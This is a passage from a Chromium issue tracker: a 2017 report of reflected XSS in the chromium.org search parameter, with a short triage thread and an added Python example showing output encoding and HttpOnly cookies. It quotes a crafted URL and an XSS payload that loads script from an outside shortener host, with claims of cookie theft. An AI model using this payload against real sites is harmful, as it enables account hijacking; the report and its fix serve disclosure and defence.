Security: Google's http://www.chromium.org Reflected XSS
Reported by
amanmahe...@gmail.com,
May 20 2017
Issue description

I have found that the http://www.chromium.org application is vulnerable to a Reflected Cross-site Scripting attack, as the s parameter of this application's following URL, http://www.chromium.org/?s=test, is used for inputting a search, but there is no proper input validation, filtration or sanitation on the server side, nor is there any output encoding etc. to prevent this Reflected Cross-site Scripting vulnerability if the attacker uses the cross-domain XSS payload with the combination of comments. So the attacker can easily steal the cookies (as the HttpOnly cookie attribute is missing) of any of those website users and can easily compromise their account.

Original XSS Vulnerable Url (Reflected XSS via GET & POST requests while searching & by injecting the XSS payload in the search field): http://www.chromium.org/?s=test

Crafted XSS Vulnerable Url: http://www.chromium.org/?s="><script src=//goo.gl/p2yht/><!--

XSS Payloads: "><script src=//goo.gl/p2yht/><!--

Vulnerable Parameter: s

VERSION
Chrome Version: [57.029] + [stable]
Operating System: [Windows 10]
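The two conditions the report names, a search parameter reflected without output encoding and a cookie without HttpOnly, shown with their corrected forms in an added Python example that is not part of the original report and is not chromium.org's code. The handler functions and the cookie name are hypothetical; the payload string is the one quoted in the report.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Payload string quoted in the report; used here only as test input.
REPORTED_PAYLOAD = '"><script src=//goo.gl/p2yht/><!--'

def render_unsafe(s):
    # Hypothetical handler: reflects `s` into an attribute with no encoding.
    return '<input type="text" name="s" value="' + s + '">'

def render_safe(s):
    # Same handler with attribute-context encoding; quote=True also escapes " and '.
    return '<input type="text" name="s" value="' + html.escape(s, quote=True) + '">'

class _Collector(HTMLParser):
    """Records the elements a parser sees and the search box's value."""
    def __init__(self):
        super().__init__()
        self.tags, self.value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")

def inspect(markup):
    # Parse the rendered markup and return (element names, value attribute).
    p = _Collector()
    p.feed(markup)
    p.close()
    return p.tags, p.value

def session_cookie(value):
    # HttpOnly keeps the cookie out of document.cookie; the name "session" is assumed.
    c = SimpleCookie()
    c["session"] = value
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["path"] = "/"
    return c["session"].OutputString()

if __name__ == "__main__":
    print(inspect(render_unsafe(REPORTED_PAYLOAD)))
    print(inspect(render_safe(REPORTED_PAYLOAD)))
    print(session_cookie("constructed-value"))
```

With encoding in place the parser sees a single `input` element whose value round-trips to the submitted string, so the search term is still displayed correctly while staying inside the attribute.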
,
May 22 2017
Also, do you have any extensions installed? If so, can you try it with the extensions disabled? In the past we've seen extensions re-write pages so as to make them unsafe.
,
May 29 2017
,
Sep 4 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by elawrence@chromium.org
, May 20 2017